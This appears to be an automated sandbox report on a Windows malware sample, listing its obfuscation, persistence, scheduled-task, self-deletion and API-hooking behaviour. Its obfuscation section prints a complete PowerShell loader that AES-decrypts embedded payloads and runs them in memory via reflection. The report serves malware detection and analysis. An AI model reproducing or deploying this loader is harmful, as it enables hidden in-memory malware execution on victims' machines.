Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000019.00000002.2281104121.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000019.00000002.2278957605.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095093033.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000019.00000002.2281104121.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000019.00000002.2281104121.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000019.00000002.2278957605.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.2278957605.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000019.00000002.2281104121.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000019.00000002.2281104121.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.2278957605.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095093033.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000019.00000002.2281104121.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000019.00000002.2278957605.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095093033.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000019.00000002.2281104121.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000019.00000002.2278957605.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095093033.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Users\user\Desktop\x.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Users\user\Desktop\x.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: IfMUlU.exe.28.drStatic PE information: 0xA8D14247 [Thu Oct 2 02:11:19 2059 UTC]
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC641E3C LoadLibraryA,GetProcAddress,SleepEx,9_2_00000225DC641E3C
Source: C:\Windows\System32\winlogon.exeCode function: 9_3_00000225DC62A7DD push rcx; retf 003Fh9_3_00000225DC62A7DE
Source: C:\Windows\System32\lsass.exeCode function: 10_3_00000202C0ACA7DD push rcx; retf 003Fh10_3_00000202C0ACA7DE
Source: C:\Windows\System32\svchost.exeCode function: 11_3_000002A6612EA7DD push rcx; retf 003Fh11_3_000002A6612EA7DE
Source: C:\Windows\System32\dwm.exeCode function: 14_3_000002BAAF1AA7DD push rcx; retf 003Fh14_3_000002BAAF1AA7DE
Source: C:\Windows\System32\dwm.exeCode function: 14_3_000002BAAEDEA7DD push rcx; retf 003Fh14_3_000002BAAEDEA7DE
Source: C:\Windows\System32\dwm.exeCode function: 14_3_000002BAAEE4A7DD push rcx; retf 003Fh14_3_000002BAAEE4A7DE
Source: C:\Windows\System32\cmd.exeCode function: 15_3_000002512A6CA7DD push rcx; retf 003Fh15_3_000002512A6CA7DE
Source: C:\Windows\System32\conhost.exeCode function: 16_3_000001BEB0A1A7DD push rcx; retf 003Fh16_3_000001BEB0A1A7DE
Source: C:\Windows\System32\svchost.exeCode function: 20_3_0000026A879AA7DD push rcx; retf 003Fh20_3_0000026A879AA7DE
Source: C:\Windows\System32\svchost.exeCode function: 21_3_000001795378A7DD push rcx; retf 003Fh21_3_000001795378A7DE
Source: C:\Windows\System32\svchost.exeCode function: 22_3_000002295D54A7DD push rcx; retf 003Fh22_3_000002295D54A7DE
Source: C:\Windows\System32\svchost.exeCode function: 23_3_00000253067EA7DD push rcx; retf 003Fh23_3_00000253067EA7DE
Source: C:\Windows\System32\svchost.exeCode function: 24_3_000001845B3AA7DD push rcx; retf 003Fh24_3_000001845B3AA7DE
Source: C:\Windows\System32\svchost.exeCode function: 25_3_000001ADEBFEA7DD push rcx; retf 003Fh25_3_000001ADEBFEA7DE
Source: C:\Windows\System32\svchost.exeCode function: 26_3_000001D55905A7DD push rcx; retf 003Fh26_3_000001D55905A7DE
Source: C:\Windows\System32\svchost.exeCode function: 29_3_00000241A9E8A7DD push rcx; retf 003Fh29_3_00000241A9E8A7DE
Source: C:\Windows\System32\svchost.exeCode function: 30_3_000001CD7317A7DD push rcx; retf 003Fh30_3_000001CD7317A7DE

Persistence and Installation Behavior

barindex
Source: unknownExecutable created and started: C:\Windows\$nya-onimai2\IfMUlU.exe
Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$nya-onimai2\IfMUlU.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$nya-onimai2\IfMUlU.exeJump to dropped file

Boot Survival

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$nya-SgIauazYJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: c:\users\user\desktop\x.batJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | deleteJump to behavior
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $nya-dll32Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
